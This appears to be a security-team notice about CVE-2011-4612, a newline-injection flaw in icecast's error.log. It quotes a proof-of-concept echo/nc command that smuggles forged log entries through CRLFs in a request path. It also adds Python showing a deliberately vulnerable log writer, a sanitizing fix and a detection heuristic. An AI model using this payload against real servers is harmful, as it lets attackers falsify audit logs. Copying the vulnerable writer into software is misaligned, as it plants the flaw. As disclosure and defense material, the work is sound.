Your friendly security team received the following report via oss-security. Please respond ASAP. The issue is public.
CVE-2011-4612
It was found that remote users could inject newlines into icecast's error.log, thereby forging log entries.
Citing https://launchpad.net/bugs/894782:
Running this command against an icecast2 running on 127.0.0.1...
echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%20fserve/fserve_client_create%20req%20for%20file%20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000 > /dev/null
...causes the following to be written to /var/log/icecast2/error.log:
[2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for file /non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny
..."
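The Python below is an added illustration, not code from the report or from icecast. It decodes the request path from the PoC above the way a server would, feeds it to a constructed log writer with the same defect (the message is interpolated unchanged), and then to a hardened writer that escapes CR/LF and other control characters so a request can never terminate an entry. It also shows a simple after-the-fact detection heuristic for an existing error.log: an entry whose timestamp precedes the previous one. The function names, the fixed timestamp and the two-space date/time separator (taken from the date format string in the PoC) are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Constructed example, not icecast's own code. The request path below is the
# decoded form of the PoC in the report: a CRLF (%0d%0a) followed by text shaped
# like a complete error.log entry, so a naive logger emits it as its own line.
CRAFTED_PATH = unquote(
    '/non-existent"%20No%20such%20file%20or%20directory%0d%0a'
    "[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%0a"
    "[2011-11-25%20%2015:37:31]%20WARN%20fserve/fserve_client_create"
    '%20req%20for%20file%20"/usr/share/icecast2/web/'
)

# Fixed timestamp so the output is deterministic (assumption); two spaces
# between date and time follow the date format string used in the PoC.
STAMP = "[2011-11-25  15:37:31]"

# One physical line that looks like a complete entry: [date time] LEVEL ...
ENTRY_RE = re.compile(r"^\[(\d{4}-\d{2}-\d{2})\s+(\d{2}:\d{2}:\d{2})\] ([A-Z]+) ")


def vulnerable_entry(level, where, msg):
    """Writer with the defect the CVE describes: the request-derived message is
    interpolated unchanged, so CR/LF inside it ends the entry early."""
    return f"{STAMP} {level} {where} {msg}\n"


def sanitize_field(text):
    """Escape CR, LF and every other control character so a field can never end
    the log line it is written into; the escapes stay visible to an analyst."""
    out = []
    for ch in text:
        if ch == "\r":
            out.append("\\r")
        elif ch == "\n":
            out.append("\\n")
        elif ord(ch) < 0x20 or ord(ch) == 0x7F:
            out.append(f"\\x{ord(ch):02x}")
        else:
            out.append(ch)
    return "".join(out)


def hardened_entry(level, where, msg):
    """Same writer, but the message is sanitized before interpolation."""
    return f"{STAMP} {level} {where} {sanitize_field(msg)}\n"


def count_entries(log_text):
    """How many physical lines parse as complete error.log entries."""
    return sum(1 for line in log_text.splitlines() if ENTRY_RE.match(line))


def backwards_timestamps(log_text):
    """Detection heuristic for an already-written log: entries whose timestamp
    precedes the high-water mark seen so far. Zero-padded ISO-style fields
    compare correctly as strings."""
    suspicious, last = [], None
    for line in log_text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        stamp = (m.group(1), m.group(2))
        if last is not None and stamp < last:
            suspicious.append(line)
        if last is None or stamp > last:
            last = stamp
    return suspicious


if __name__ == "__main__":
    msg = "checking for file " + CRAFTED_PATH
    print(vulnerable_entry("INFO", "fserve/fserve_client_create", msg), end="")
    print(hardened_entry("INFO", "fserve/fserve_client_create", msg), end="")
    for line in backwards_timestamps(vulnerable_entry("INFO", "fserve/fserve_client_create", msg)):
        print("suspicious:", line)
```

Run stand-alone, the vulnerable writer produces three lines that all parse as entries (the forged 1970 "PHUN" line and a forged WARN line among them), while the hardened writer produces one line in which the injected CRLFs appear as literal `\r\n`. The timestamp check flags only the 1970 entry; it is a heuristic, since a forger who chooses a plausible current timestamp, as the PoC's second forged line does with `date`, is not caught by it, which is why escaping at write time is the real fix.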